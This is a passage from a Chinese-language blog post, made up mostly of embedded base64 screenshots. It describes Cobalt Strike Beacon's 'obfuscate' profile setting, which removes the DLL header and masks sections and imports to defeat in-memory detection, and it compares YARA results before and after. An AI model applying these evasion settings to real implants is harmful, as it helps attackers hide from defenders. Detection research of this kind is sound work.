ZA5P0lkqOuGd2tEq3WqyKDIrOQZ2qGzkqY4A1siSfMyp4jIvQ7lz0Dd//yrGT9dPN2alJhw67ZnUtng7U++iv/p4unJyXLXEcm61/9wSeL05OQZ0h9VqVvWjKxEkeHuDu9AkjU+QR4OysMvr0wvz5tmTZye0Dk8KJKcOE1Ehu4/VHZL/+Wvk3+8ICl+WrK1a3BIXeDQ7S/Of/NYRKTz8+ZOzTKT0ufGi8i39isPReTW7W/n5k7TRL5ERPoffGtLnJY0Y7oMBJ+6Jdb0koJU3ZMrMafYJtrw1pTM3GlDjtiaNWO+7YGIPD93afFcdZjm34uK8oXwFgAAAAAgMO32NiWA5R3ecga2Ao2UiVFs69mzkafPRkRkasJzT0ae/M+zfzx+8v2Tp//zj7//XeKefW/9P0Xk++//fnfA9XabkZ4W989PE2YNEttSpMybnSDDN++Z9Zg0a16GdFy6kbD0ZYPY1tSZ0xNEZGhIJzJlnZIgMijWqW7zDn396cdfO2efN3umiAx13Qx9R13x85ctzR6+9oemq26D+x/026YnJ86en/DAs/FlBEtInm4VkaFhbZEHOz9v6vSa1H0a65z05E6lHaLay5UieW6aVR53Dgy7fVbUIXnGNBGR+9+qkayBbwdypyXJtKQk6XcG15SBienZ1oe3gmvJm7jg9Rk/lOHeC63dQzLN9tr8pOFe728jOrZkWuKMKdIlIjLU9dXFbySzYHGiKN9MdHa89WXnkFgslqScojnxU0Qe6y4JAAAAABAb/AkzBZpspRveGk1gSwzztkRkZEREHj/5vu9///Xx0+9HJj2Je+7ZpMlPJz179mTkHyJiscjkyXEiFjVzy2KZ/E9P/iXxr5MmPTNboTVz9dp8R29Qw1+fOX/tO+e4hEWvFi9w9hQ1ePvPH9/6zjlqVfF8t06k7l/6L7umcV9ywb/mzXL+1X/lf/1F0yjuhawfr5jjmnvozsefdHwnIrPy/21JosjwjS8ezFoy2znB3S/+dOmu2UaIuHWkNdhx51HWbMfaH3x28nKfJEy1isiwzCxat9z1ybq7X/zZ1R/8zLyXkx589vmgvGS4koSEeBG5d88jm2h4cCg+wTpj1ky5N5SYbH08ODRFJ/MrYe5LmVNEHt/6MrikLZGEOasWTxeRoYH7nnGqhMSZVpFh73mGh4ZErFOsVpHAYlvx80tfyXJuxXD3p0qf9MmLfpKv9vM19E334Nz0ZHWKh19+dM2xL+Pnlb6cFe+a99yFroBWnhA/RUT6TTKkrBnL8qaJfPvVZXWa/svn3JpdWqcnxYsMf9s/JCLxCVYReSxJL5VpuusauHr+qwERmZ6kdD332Ln7hoeHReLFatUGjJSBz8dbA+2lTuknS+T+15elJH9GaslrjhaF8anFrzpbF6qxKmWWzJxU63DvN+IorXVaYrwMdfXoNogcaG8JZ2/7AAAAAIBo5hHeGmVgS8z72xKRm/fvjcQ9nTT5adzkZ5OeexYX99QS90zJzPrBD34wMznZ+eW1uEmTJj/3j+fjh/XyVDQS4hOUoNUL2atXzlmwslTU
</p>
<p>yara检测结果如下，很明显清除原始beacon dll后有些检测已经从2个变成一个了</p>
<p><img loading=lazy src="data:image/png;base64,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
</p>
<h4 id=0x0314-配置混淆>
 0x0314 配置混淆
 <a class=heading-link href=#0x0314-%e9%85%8d%e7%bd%ae%e6%b7%b7%e6%b7%86>
 <i class="fa-solid fa-link" aria-hidden=true title="Link to heading"></i>
 <span class=sr-only>Link to heading</span>
 </a>
</h4>
<p>通过配置Stage.obfuscate为true，可以实现反射加载器复制Beacon，而不带它的DLL头，这就意味着在内存中无法再找到反射加载程序存根，而且这个选项还会混淆：</p>
<ul>
<li>.text section</li>
<li>Section names</li>
<li>Import table</li>
<li><a href=https://0xrick.github.io/win-internals/pe3/#dos-stub class=external-link target=_blank rel=noopener>Dos</a>/<a href=https://0xrick.github.io/win-internals/pe3/#rich-header class=external-link target=_blank rel=noopener>Rich Header</a> (this is technically not masked but overwritten with random data)</li>
</ul>
<p>大概的示例图如下：</p>
<p><img loading=lazy src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAgAAZABkAAD/7AARRHVja3kAAQAEAAAAZAAA/+4AJkFkb2JlAGTAAAAAAQMAFQQDBgoNAAB8HwABU/gAAb4jAAIeZv/bAIQAAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQICAgICAgICAgICAwMDAwMDAwMDAwEBAQEBAQECAQECAgIBAgIDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMD/8IAEQgDMgPoAwERAAIRAQMRAf/EAUcAAQACAwEBAQEBAAAAAAAAAAAICQUGBwQDAgEKAQEAAQUBAQAAAAAAAAAAAAAABAECAwUHBggQAAEABwYEBQIGAwACAwEAAAABAgMEBQYHEhMUFRYXMFARCDIzNDU2MRgQIEBgNzghQUMiI5CgJIARAAAFAgICCBAKBggEBAQHAAECAwQFAAYREhM2IdIUlNQ1lQcwMdEiMpKT0zR0tBV1tdV2UEFRkSMzs6WWthBhcnMWNyBAQlJisiQIYHGBgqFDJReQsVNUgPFjZMRlJhIAAQICAwkNBwIFBAEDBQAAAQACMQMRkTMhQXHREjKS0gQwUFGhscEiQqKyE3M0EGBhgfFygoMUQPBSwwUg4WIjwpCgJOJDk0QVEwEAAgAEAwgCAwEAAwEAAAABABHwITFhQdHxMFBRcZGhscEQgUBg4SBwgJCg/9oADAMBAAIRAxEAAAG/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFeB2MlYAACIJzo6IS/NdIak7AAAAcHO8AEQCX5CIxhPAAAAAA44QmLBDmYJCAAAAAAAAAAAA/hHYyhygmacHO8AAEQCRBXcT5OngAAAAFfRuh00kIR7JCAAAAAAAAAAAAoCN+NiI4E7CJBMAsXKmiUpU+TPOVH2JinKyCBYycEO2HGDBnDjrBjDoxD4/0vFGBphIYjASZOUnWAbwc6MIeclWYUlmVrGWBb+AAAAAAAAAAAAU7n1N0OAHPSUpPsq/PKes3Am+Vgm0nJDv5px6T9kriIhuRzgzhd4VAHSSJhfSVAFv4AAAAAAAAAAAKdT9mokdizgicbIXHFJJ7TGnTTXDvpC03w5ubuZ06+cmPOaoaSb6ZQjqf6Pyj41M6QcOJDHLjfzZjPmonPi1QggdaOFnSyDR0YsDJpAAAAAAAAAAAArTNYMWDaDKEeTTzYD5nXiaJWOZcjOTkOPH4PoTGIXG4G/gtnKFjej8E1iq0v8NyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABHbN5jUboQAAAAAAAAAAAAAAAAAAAAAAAHbMW/6XZtQAAAAPmpxDLoAAAAAAAAAAAAAAAAAAAAAAAAB2TFvPeyAAAAAU97DiU5I3QAAAAAAAAAAAAAAAAAAAAAAABrdYvGcuisqhdUAAAAAxFcFFWy4RLqN74AAAAAAAAAAAAAAAAAAAAAAARtz+OtohdX65j3QAAAAFVE7j9q8HsGhH9OYnQgaSbUbIeM9huAAAAAAAAAAAAAAAAAABqN0KAcvnFlULqgAAAAGIrgqXm8ssPg9aw5mADDmYAAAAAAAAAAAAAAAAAAAABCqXzidOD1vXMe6AAAAAqoncftXg9gonMET+NgKyCRBzMmeR9M6W0AAAAAAAAAAAAAAAAAAGo3QoBy+cWVQuqAAAAAYiuCpebyyw+D1qs4wp9j2mALVwAAAAAAAAAAAAAAAAAAAAQql84nTg9b1zHugAAAAKqJ3H7V4PYI+EfjMGcM2b4aScZJQH1OanpJYgAAAAAAAAAAAAAAAAGo3QoBy+cWVQuqAAAAAYiuCpebyywmD1qGJ9jaznJuhLUAAAAAAAAAAAAAAAAAAAAEKpfOJ04PW9cx7oAAAACqidx+1eD2AAAAAAAAAAAAAAAAAAAAAAAAajdCgHL5xZVC6oAAAABiK4Kl5vLLD4PWgAAAAAAAAAAAAAAAAAAAAAABCqXzidOD1vXMe6AAAAAod2vzv41gAAAAAAAAAAAAAAAAAAAAAAA8FcU043vLKoXVAAAAAMRXBUvN5ZYfB60AAAAAAAAAAAAAAAAAAAAAAAIVS+cTpwet65j3QAAAAFAe2+cOZX6kAAAAAAAAAAAAAAAAAAAAAAAeatllELqllULqgAAAAGIrgqXm8ssPg9aAAAAAAAAAAAAAAAAAAAAAAAEKpfOJ04PW9cx7oAAAACgPbfOHMr9SAAAAAAAAAAAAAAAAAAAAAAAPNWyyiF1SyqF1QAAAADEVwVLzeWWHwetAAAAAAAAAAAAAAAAAAAAAAACFUvnE6cHreuY90AAAABQHtvnDmV+pAAAAAAAHOjaj8AzxgT8GcP2fI/Z+DAGfP2fwH1AAAAAAAPNWyyiF1SyqF1QAAAADEVwVLzeWWHwetAAAAAAAAAAAAAAAAAAAAAAACFUvnE6cHreuY90AAAABQHtvnDmV+pAAAAAAAHPz5n0B0A5IfI8BkD2mENkNQPqZEzR5jqIAAAAAAB5q2WUQuqWVQuqAAAAAYiuCpebyyw+D1oAAAAAAAAAAAAAAAAAAAAAAAQql84nTg9b1zHugAAAAKA9t84cyv1IAAAAAAA50bOa2ew2sxR+DwHtMEZIxpkTHmcPqY03IAAAAAAA81bLKIXVLKoXVAAAAAMRXBUvN5ZYfB60AAAAAAAAAAAAAAAAAAAAAAAIVS+cTpwet65j3QAAAAFAe2+cOZX6kAAAAAAAAAAAAAAAAAAAAAAAeatllELqllULqgAAAAGIrgqXm8ssPg9aAAAAAAAAAAAAAAAAAAAAAAAEKpfOJ04PW9cx7oAAAACgPbfOHMr9SAAAAAAAAAAAAAAAAAAAAAAAPNWyyiF1SyqF1QAAAADEVwVLzeWWHwetAAAAAAAAAAAAAAAAAAAAAAACFUvnE6cHreuY90AAAABQHtvnDmV+pAAAAAAAAAAAAAAAAAAAAAAAHmrZZRC6pZVC6oAAAABiK4Kl5vLLD4PWgAAAAAAAAAAAAAAAAAAAAAABCqXzidOD1vXMe6AAAAA/z47b5r4Hm84AAAAAAAAAAAAAAAAAAAAAAAPkpbLA7JZVC6oAAAABiK4Kl5vLLD4PWgAAAAAAAAAAAAAAAAAAAAAABCqXzidOD1vXMe6AAAAAoC23zhy6/UAAAAAAAAAAAAAAAAAAAAAAADzVssthdVsqhdUAAAAAxFcFS83llh8HrQAAAAAAAAAAAAAAAAAAAAAAAhVL5xOnB63rmPdAAAAAUB7b5w5lfqfOeY9Z+zEGaAAAAAAAAAAAAAAAAAAAAB5q2WUQuqWVQuqAAAAAYiuCpebyyw+D1oAYMzgAMcZEAAA+B9wYoimScNlAAAAAAAAAAAAIVS+cTpwet65j3QAAAAFAe2+cOZX6nBnMj0nyMqdQAAAAAAAAAAAAAAAAAAAAB5q2WUQuqWVQuqAAAAAYiuCpebyyw+D1r/AD+FiR7CtQtGNNNgOLHnJdkbTIneTSDRjw
</p>
<p>这项设置可移除Beacon堆中的绝大部分字符串</p>
<pre tabindex=0><code>set obfuscate "true";
</code></pre><p>后面是配置obfuscate为true的内存，可以看到直接去除掉了dll头部</p>
<p><img loading=lazy src=data:image/png;base64,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
</p>
<p>yara检测设置obfuscate为true的前后对比</p>
<p><img loading=lazy src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABqwAAAHGCAIAAACO/j1EAAAgAElEQVR4nOzdO7bbOJQoULlXz6aCCivVgB04dKjQzuy17PHcF7CtR/NziC8/0t7RlUgAByBEUriA+Onj4+P3z++32+12u33+8vXxeDwejxsAAAAAcH2/fnz759///ufoMAAAAACAXv7597/fP78bBAQAAACAl/X753czAQEAAADglZkJCAAAAAAvzkxAAAAAAHhxZgICAAAAwIszExAAAAAAXpyZgAAAAADw4swEPJHH4/F4PPZPC0A/73Z+Pmd9zxnVaWmuwzkEAEAPw0zA/w32GN+C3O/3xHyHVGv7z7fG++8jMYa2ux2uX5w9ck7pV2OtSk+pywnrW/bhTYxqrndvv+JZ5VhBB7hi44xjnsS/2Sc7fRbmge2pa6U6KWur83z2z/DBOeoM3FuPu836QtOvwvN99r8rOK3g7J2efJB7mFKOUZAzALyejZmAk3tN/5N8tkCPprjf78W3IDVpX9i79dh3q+9JnHO+RvrZ+5zxv5Ie5+czX53PeT06Z1SntXNznbk/r+kdsx47iNs5vn5tpg1eAsCrin4T8Hk5HN+IJF4jx//uu4rNmJ//abxi7V5DSsvf/xheXvowZdV3vnOnrxCTFp687Oe0n7sTBlZz9r6u+8xk04GxtfVux/eEH7EDHXUG7ufA/lzcdO/2GTxKTTvHaR1BAN7WMBMwWg48vtHcJaT/UzaB/zlON7mQz/dZyzmOZ9waw78fF3OeZDuJavgjMaR5jRZ3CKqzmfli5JstGbRwnHMcVcoRTDTPJCg3Zes8yHnC+vru80FLWUBXs0wmpdfNt25+UmqklzvfZ7M3Lp4Qbgnt3DuqtU2VNvvz5jsFgU0G9fIiDm22ZNlZNE6YuEOKgpzLjmBWnwwKDa44QSTFaq6wi9GmZN77HLum/i6oydl7MedYfL5K/yilx7xp88oeZNvq/ioOePFj0uQud/5OzdWq+Ow92XmtiGDwLu5Xk7v69MA29fh0A0ATHZ8OvHlhDkxSZb2MC43Ttop5MYfJHWFWKZuZpyTMTZu1f9uoNu/nDulX4/fLvkis5Rwc35r61qjpOVlpg9aYf1IatkZWr0vZs0lszaPqIb0/b1Zn/46douzM0LygwNrX8sScd7suNJTy+Xo8Hs0v3/HFd7fzZK7iu6DKUorvVbIKqim3VVSbn8FN9ZFsjgA2KSUufZ+yJkU0GVObnFJyc37MzONcewkAx9qeCbip4SV5LcPh+jq5YI9fPpamC639Y3Yt5/qYb+EXlcn8pnmo8V3CWn2DtJv1HYe0WXT8ZnrONUewRlxuYt9Yq1R9fTdbY7Ne43wqpR+jgrRxz7mFn5TA/e+5ePPDsVnu4m65aXNPKb2jmhyO8ZtlXSU+vs9DNj5w82/L